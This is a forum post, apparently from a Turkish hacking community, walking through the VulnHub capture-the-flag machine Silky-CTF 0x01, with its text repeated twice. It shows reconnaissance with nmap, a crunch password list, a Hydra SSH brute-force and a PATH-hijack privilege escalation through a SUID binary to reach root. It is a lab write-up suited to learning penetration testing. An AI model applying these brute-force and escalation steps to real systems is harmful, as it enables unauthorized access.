Hi TurkHackTeam Family, I'll show you "How to Solve Silky-CTF: 0x01 Vulnerability Machine" today.
https://www.vulnhub.com/entry/silky-ctf-0x01,306/
Machine Name: Silky-CTF: 0x01
Release Date: 27 April 2019
Author: Silky
Series: Silky-CTF
Description: Find the Flag on Target's Root directory
File Size: 2.5 GB
Operating System: Linux
Difficulty: Easy-Medium
First of all, to learn to Machine's IP adress, type:
We learned IP address of our target with this.
To learn which ports are open by NMAP scanning, type:
As you can see 22 and 80 ports are opened and what important in here is robots.txt and notex.txt which i was particularly showed with blue color.
I understand it was a website because 80 port are opened. When I go to website I can see this is a website apache-based website.
First, I went to robots.txt, it forwarded me to notex.txt. There is a text in Deutsch.
When we translate It, I see this message "I absolutely have to remote the password from the page, after all, the last 2 characters are missing. But still.".
Next, i back to website and I looked to codes and I found somethings in "script.js" file.
As you can see we found some values about password.
"Password's last 2 letters lost" gave us a hint.
I'll create password list with crunch tool.
I wrote this in terminal and password list created.
We'll brute attack to SSH service with Hydra tool, type the following code to the Terminal:
Now we got the password.
To connect as SSH, type:
I searched for SUID featured files and /usr/bin/sky file caught my eye.
I wrote this and saw some Deutsch texts and the word of root.
I already ran whoami command.
To Boost to root, I'll use PATH variant. For this:
In a kind of funny way, i didn't get root boost by typing "id".
But when i type the above code, i didn't get any error about permissions and got my flag.
/Translation Club M3m0ry\
https://www.vulnhub.com/entry/silky-ctf-0x01,306/
Machine Name: Silky-CTF: 0x01
Release Date: 27 April 2019
Author: Silky
Series: Silky-CTF
Description: Find the Flag on Target's Root directory
File Size: 2.5 GB
Operating System: Linux
Difficulty: Easy-Medium
First of all, to learn to Machine's IP adress, type:
Kod:
sudo netdiscover
![HCefxM.jpg](https://i.resimyukle.xyz/HCefxM.jpg)
We learned IP address of our target with this.
![x3aPc8.jpg](https://i.resimyukle.xyz/x3aPc8.jpg)
To learn which ports are open by NMAP scanning, type:
Kod:
nmap -A IP_ADDRESS
As you can see 22 and 80 ports are opened and what important in here is robots.txt and notex.txt which i was particularly showed with blue color.
![aJyUOR.jpg](https://i.resimyukle.xyz/aJyUOR.jpg)
I understand it was a website because 80 port are opened. When I go to website I can see this is a website apache-based website.
![OM8MIy.jpg](https://i.resimyukle.xyz/OM8MIy.jpg)
First, I went to robots.txt, it forwarded me to notex.txt. There is a text in Deutsch.
![HT3xRx.jpg](https://i.resimyukle.xyz/HT3xRx.jpg)
When we translate It, I see this message "I absolutely have to remote the password from the page, after all, the last 2 characters are missing. But still.".
![Ke8LcN.jpg](https://i.resimyukle.xyz/Ke8LcN.jpg)
Next, i back to website and I looked to codes and I found somethings in "script.js" file.
![9G0QTO.jpg](https://i.resimyukle.xyz/9G0QTO.jpg)
As you can see we found some values about password.
![zPN2yA.jpg](https://i.resimyukle.xyz/zPN2yA.jpg)
"Password's last 2 letters lost" gave us a hint.
I'll create password list with crunch tool.
Kod:
crunch 7 7 -t s1lKy^% >> password.txt
I wrote this in terminal and password list created.
![M3bWQV.jpg](https://i.resimyukle.xyz/M3bWQV.jpg)
We'll brute attack to SSH service with Hydra tool, type the following code to the Terminal:
Kod:
hydra -l silky -P password.txt IP_ADRES ssh
Now we got the password.
![PfcTxR.jpg](https://i.resimyukle.xyz/PfcTxR.jpg)
To connect as SSH, type:
Kod:
ssh silky@IP_ADDRESS
![J37bP4.jpg](https://i.resimyukle.xyz/J37bP4.jpg)
I searched for SUID featured files and /usr/bin/sky file caught my eye.
Kod:
/usr/bin/sky
I wrote this and saw some Deutsch texts and the word of root.
![abc2eJ.jpg](https://i.resimyukle.xyz/abc2eJ.jpg)
I already ran whoami command.
![U0V0W8.jpg](https://i.resimyukle.xyz/U0V0W8.jpg)
![Hc614c.jpg](https://i.resimyukle.xyz/Hc614c.jpg)
To Boost to root, I'll use PATH variant. For this:
Kod:
echo '/bin/sh' > whoami
chmod 777 whoami
export PATH=/tmp:$PATH
/usr/bin/sky
In a kind of funny way, i didn't get root boost by typing "id".
Kod:
cd /root
But when i type the above code, i didn't get any error about permissions and got my flag.
![SUMJax.jpg](https://i.resimyukle.xyz/SUMJax.jpg)
/Translation Club M3m0ry\
Son düzenleme: